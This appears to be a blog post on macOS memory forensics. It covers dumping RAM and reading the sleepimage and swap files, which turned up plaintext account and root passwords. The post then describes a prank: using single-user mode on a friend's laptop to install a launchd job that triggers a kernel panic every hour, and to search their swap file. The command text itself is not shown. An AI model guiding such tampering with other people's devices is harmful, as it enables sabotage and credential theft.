A couple months ago I was tooling around on the mac causing some kernel panic dumps to see what info the dump file writes out. The panic file wasn’t overly cool, so it caused me to hunt around for more “interesting” items on my machine. Of course, the first interesting item I looked thru was the laptop memory. Unlike a lot of OS X’s Unix brethren, the memory device files aren’t enabled in the kernel so you have to enable them and reboot.

After reboot, I dumped the memory to a file which took about 67 seconds for my 2GB of ram. I’m not sure what the Bad address issue is. I haven’t looked into it but it still dumps the file.

Then I filtered out the “readable” stuff by just running strings against it, only grabbing the ascii strings 4 characters or greater.

Like memory dumping on other OS’es, there isn’t anything new here but they are always some useful and interesting items to browse thru and reading the memory is always worth a look but I moved on and started to poke around at other files. In my case the hibernation file and the swap files were pretty juicy, definitely better than my memory dump.

Reading the sleepimage-ascii file I was able to find my regular account and the root user passwords, plus a ton more interesting things.
The swapfile had some cool items too. I noticed some MobileMe calls. I am not sure what kicked off the MobileMe since I don’t use it and believe I have disabled it in iTunes and such but this was a fairly new installation so it could have been pre-configuration leftovers. But I do wonder, does this mean if I had a MobileMe account the password could show up in the swapfile? I might have to sign up for MobileMe and give it a whirl.

While the panic file created using dtrace was a little disappointing it got me thinking of “evil” uses of it. I’ve been to my local Apple store a lot lately, so I started envisioning all their demo machines crashing at the same time every day but that wouldn’t be too cool and everyone I have dealt with at the store is pretty cool, so I wouldn’t want to tick them off. Doing this to a friend on the other hand might but worth the repercussions. Not that I would do such an immature thing but let’s say you wanted to mess with your friend’s bright and shiny macbook here is what I would do. Depending on your typing skills you might need 5-10 minutes alone with the laptop. First reboot the laptop and enter into single user mode by pressing the Command (Apple) key + s (or F2 if using refit). Once in single user mode create a little script to run in OS X’s crontab replacement, launchd. I like calling a script instead a specifying the program and arguments in the launchd task because I always find it easier to troubleshoot if something isn’t working nicely.

In the script add the following and then change the perms to be executable.

Next create a plist file (an overly complex xml file just to add a cronjob) in the LaunchDaemons dir, putting it in the LaunchDaemons dir will allow it to execute during it scheduled time without the need for a particular user to be logged in.

In the plist file add

Then initiate the newly created plist file.

Now every 60 minutes the laptop will kernel panic causing a hard reboot.
While you are in single user mode and if you have the time, you might as well have some more fun with their laptop and poke thru the swapfile and sleepimage. You could also enable the memory device driver file so you can poke thru there but you would need to reboot.